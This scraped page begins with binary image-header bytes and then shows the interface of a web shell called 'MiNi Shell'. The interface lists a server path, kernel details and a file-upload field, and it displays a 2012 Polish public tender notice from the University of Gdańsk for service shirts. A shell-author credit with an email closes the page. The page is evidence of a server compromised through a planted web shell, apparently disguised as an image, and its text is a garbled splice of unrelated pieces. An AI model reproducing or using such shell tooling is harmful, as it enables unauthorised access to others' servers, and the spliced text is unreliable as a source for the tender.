JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/149985-N-2012.html

<p class="kh_header"><b>Gdańsk: Dostawa koszul służbowych dla Straży Uniwersyteckiej Uniwersytetu Gdańskiego</b><br>
<b>Numer ogłoszenia: 149985 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa koszul służbowych dla Straży Uniwersyteckiej Uniwersytetu Gdańskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest : dostawa  koszul damskich:  33 szt. krótki rękaw, 33 szt. długi    
    rękaw  oraz  koszul męskich  78 szt.  krótki  rękaw i  78 szt. długi  rękaw,  zgodnie  z  opisem       
    w  załączniku  nr 2,  rozmiarami  zgodnymi z  opisem w  załączniku nr 8 i wzorcami  w postaci   
    załączonych rysunków,(załącznik nr 9) zwanych w dalszej  części artykułami.
2. Wspólny Słownik Zamówień (CPV): 18332000-5.                    
   3. Zamawiający  wymaga  aby  oferowane artykuły  w celu zachowania   odpowiednich parametrów i standardów jakościowych, były takie, jak wymienione  w opisie   załącznika nr 2, 8 i 9 do SIWZ.
4. Zamawiający  nie  dopuszcza  możliwości  składania  ofert   równoważnych.                        
5. Wykonawca  dostarczy artykuły  własnym transportem, i zapewni rozładunek  w   miejscu przeznaczenia  wskazanym  przez  Zamawiającego.
6. Dostawa      artykułów    ( do   magazynu  na   adres  80-952  Gdańsk,  ul.  Wita  Stwosza  58 )          
    następować  będzie  w  terminie  nie  dłuższym  niż  30 dni   od  daty   podpisania  umowy  od  
    poniedziałku  do  piątku  w  godzinach  od 7:00 - 15:00. Zamawiający  dopuszcza możliwość realizacji    zamówienia      partiami   z  zastrzeżeniem  iż   całość  dostawy  zostanie     zakończona   w powyższym terminie.                                                                                                 
7. Wykonawca  skontaktuje  się  z  osobą  wymienioną  w  rozdziale  
II ust.  9  SIWZ   w celu    
    potwierdzenia  terminu dostawy.
8. Dostarczona partia artykułów nie zostanie odebrana przez Zamawiającego w przypadku   
    stwierdzenia niezgodności z opisanym w SIWZ przedmiotem zamówienia, umową lub fakturą.
9. Pracownik Zamawiającego  odpowiedzialny  za  odbiór  artykułów:  p. Barbara  Rogatka. 10.Zamawiający       wymaga      aby      dostarczone       artykuły       posiadały      nienaruszone                          
     opakowania   fabryczne  oraz   nienaruszone  cechy   pierwotnego  opakowania,   opatrzone   
     były wszytymi metkami z nazwą  producenta, składem tkaniny, temperaturą prania         
     i  rozmiarami   zgodnymi     z  wyspecyfikowanymi  w  Załączniku  nr  8  do  SIWZ
11.Zamówienie powinno być zrealizowane w sposób pozwalający jednoznacznie    
     przyporządkować   partie   artykułów   wyspecyfikowane   w    tabeli   zapotrzebowania                          
     z  indywidualnymi  wymiarami. 
12.W przypadku niezgodności wymiarów dostarczonych artykułów z tabelą (załącznik 8 do 
      SIWZ) Wykonawca  zobowiązany  będzie  do  wymiany  partii  artykułów  w  terminie 14 dni.
13.W razie  stwierdzenia  wad  w odebranych  artykułach  Zamawiający  złoży  stosowną   
      reklamację (pisemną) według § 6 projektu umowy do SIWZ.
14.Gwarancja  12 miesięcy, obejmuje wszystkie wykryte podczas eksploatacji wady oraz  
     uszkodzenia powstałe w czasie poprawnego, zgodnego z przeznaczeniem użytkowania przy  
     czym Wykonawca może zaproponować czas gwarancji dłuższy.  
15.Wykonawca    zapewni    niezmienność  cen   do   końca   realizacji   zamówienia             
16.Ceny  jednostkowe  netto  będą  podstawą  przy  rozliczeniach faktur  przez cały okres  
 trwania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.33.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
           spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Zamawiający wymaga wykazania  się  przez Wykonawcę, wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem dostaw w  zakresie niezbędnym  do wykazania  spełniania warunku wiedzy i doświadczenia w okresie  ostatnich  trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie, poprzez realizację co najmniej  jednej dostawy  o wartości  nie mniejszej niż   13.000,00 PLN brutto, odpowiadającej swoim rodzajem, dostawie stanowiącej przedmiot zamówienia,  z podaniem  wartości, przedmiotu zamówienia, daty wykonania i odbiorcy, oraz załączenie dokumentu potwierdzającego, że ta dostawa  została wykonana  lub jest wykonywana należycie.

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana  wg formuły  spełnia - nie spełnia na podstawie  dokumentów opisanych w rozdziale V SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
           spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
           spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
           spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Oświadczenie o podwykonawcach - Wykonawca wykonujący zamówienie  wyłącznie siłami własnymi   nie dołącza do oferty załącznika nr 7 (do SIWZ).
2) Zaakceptowany   przez  Wykonawcę  projekt  umowy - załącznik nr 5 do SIWZ,  Wykonawca może też zastosować się do  informacji  zawartej w rozdz. XVI pkt 1.
     W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy 
     ci składają łącznie dokumenty, o których mowa w pkt. 3 i 4 SIWZ.

Wykonawcy mający siedzibę lub miejsce zamieszkania za granicą:
1)	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
Zamiast dokumentów  wymienionych  w  rozdziale V pkt. 2 ppkt.  2),3),4), składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)  nie otwarto jego  likwidacji ani nie ogłoszono upadłości,
             b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne     i zdrowotne albo że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.        
2)	Dokumenty, o których mowa w pkt. 1 ppkt. a), powinny być wystawione nie wcześniej 
niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty , o których mowa      w pkt. 1 ppkt. b), powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
   
Informacje dotyczące składania dokumentów.

1) Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniami          na język polski, poświadczonymi za zgodność z oryginałem przez Wykonawcę. Wykonawca, według swojego uznania może też przedstawić tłumaczenie dokonane przez tłumacza przysięgłego, które nie wymaga poświadczenia za zgodność.
2) Dokumenty mają być składane w formie oryginału lub kserokopii poświadczonej                    za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy zgodnie z wpisem w stosownym dokumencie uprawniającym     do wystąpienia w obrocie prawnym) lub notariusza.
   3) Dokumenty muszą być wystawione zgodnie z terminami określonymi powyżej, przy czym ważny będzie również dokument wystawiony w okresie wcześniejszym, jeżeli zostanie potwierdzony przez organ wydający w wymaganym terminie.
4) Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa   w art. 25 ust.1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba      że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału                 w postępowaniu nie później niż w dniu, w którym  upłynął termin składania ofert - art. 26 ust. 3 ustawy.
5) Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy  nie wykażą spełnienia warunków udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
6) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w trybie art. 23
     ust. 1-4 ustawy, w tym w ramach konsorcjum.



7) W przypadku opisanym w ppkt. 6) Wykonawcy ustanawiają pełnomocnika                            do  reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania   w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
8)	Jeżeli oferta Wykonawców, o których mowa w ppkt 6), została wybrana, Zamawiający żąda aby przed zawarciem umowy Wykonawcy Ci przedłożyli umowę regulującą ich współpracę (art. 23 ust.4 ustawy).
9)	 W przypadku, gdy Wykonawcę reprezentuje pełnomocnik (można wystawić jednorazowe          
     pełnomocnictwo do danego konkretnego postępowania), do oferty musi być załączone           
     pełnomocnictwo (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika 
     z dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby uprawnione   do reprezentacji. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez osoby udzielające pełnomocnictwa lub notariusza.
10)	Wykonawca może polegać na wiedzy i doświadczeniu lub zdolnościach innych podmiotów, niezależenie od charakteru prawnego łączących go z nim stosunków. 
       Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu  do  dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (dokument ten musi być dołączony do oferty w oryginale).
11)	Jeżeli Wykonawca, wykazując spełnianie warunku, o którym mowa w rozdziale IV pkt 1, ppkt 2) i 3) polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w rozdziale V pkt 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotna zmiana postanowień umowy dopuszczalna  jest w następujących przypadkach:
      1)  zmiany terminu realizacji umowy  z przyczyn  leżących po stronie Zamawiającego (sytuacja ekonomiczna, zdolności płatnicze lub warunki organizacyjne czy też z przyczyn technicznych) lub zmiany te są korzystne dla Zamawiającego, 
       2)   zaistnienia siły wyższej,
       3)   zmiany obowiązujących przepisów prawa.
Zamawiający może odstąpić od umowy:
1)	 Zamawiający może odstąpić od umowy, jeśli wykonanie umowy nie leży w interesie publicznym, zgodnie z art. 145 ustawy.  W tym wypadku,  Zamawiający może odstąpić od umowy w terminie  30 dni  od powzięcia wiadomości   o tych  okolicznościach.
2)	 W wypadku określonym w pkt. 1 Wykonawca może żądać jedynie  wynagrodzenia należnego  mu z tytułu  wykonania części umowy.
3)	Zamawiający może również odstąpić od umowy na zasadach określonych w pkt.1 i 2 niniejszego ustępu , w wypadku ogłoszenia upadłości lub likwidacji przedsiębiorstwa Wykonawcy, wydania  nakazu zajęcia majątku Wykonawcy.
4)	Zamawiający może odstąpić od umowy w trybie natychmiastowym w przypadku, gdy dostawa jest realizowana wadliwie lub sprzecznie z umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul. Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2012 godzina 11:00, miejsce: Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul. Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający nie dopuszcza możliwości składania ofert częściowych.
2.	 Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
3.	 Zamawiający nie zamierza zawrzeć umowy ramowej, jak i ustanowienia dynamicznego   
      systemu zakupów.
4.	 Zamawiający nie zamierza dokonać wyboru najkorzystniejszej oferty                           
 z zastosowaniem aukcji elektronicznej .
5.	Zamawiający nie dopuszcza możliwości składania ofert  równoważnych. 
6.	Zamawiający nie dopuszcza możliwości dokonania przedpłaty. 
7.	Koszty opracowania i dostarczenia oferty oraz uczestnictwa w przetargu obciążają  
wyłącznie Wykonawcę.        
8.	Zamawiający udostępnia SIWZ na stronie internetowej www.ug.edu.pl;  od dnia  
zamieszczenia  publikacji w Biuletynie Zamówień Publicznych do upływu terminu 
składania ofert.
9.	SIWZ w formie papierowej na wniosek Wykonawcy przekazuje się odpłatnie (10 groszy    
     za stronę+ koszty przesyłki - listem poleconym za zwrotnym potwierdzeniem odbioru) -   
     art. 42  ust. 2 ustawy.
10.Zamawiający   w  szczególnie  uzasadnionych przypadkach może w każdym  czasie,  
     przed upływem terminu do składania ofert, zmienić treść SIWZ. Dokonaną  zmianę  
     Zamawiający przekazuje niezwłocznie wszystkim Wykonawcom, którym 
     przekazano SIWZ oraz zamieści na stronie internetowej Zamawiającego.
11.Jeżeli zmiana treści SIWZ prowadzi do zmiany treści ogłoszenia o zamówieniu, 
     Zamawiający zamieszcza ogłoszenie o zmianie  ogłoszenia w Biuletynie Zamówień   
     Publicznych.
12.Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia  
     o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian  w ofertach,  
     Zamawiający przedłuży termin składania ofert. O przedłużeniu terminu składania 
     ofert Zamawiający niezwłocznie zamieści informację na stronie internetowej 
     Zamawiającego - art. 38 ust. 6 ustawy.
13.Zgodnie z zapisem art. 8 ustawy oraz regulacją ustawy o dostępie do informacji publicznej   
     postępowanie o udzielenie zamówienia publicznego jest jawne. Zamawiający może  
     ograniczyć dostęp do informacji związanych   z postępowaniem tylko w przypadkach   
     określonych w ustawie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com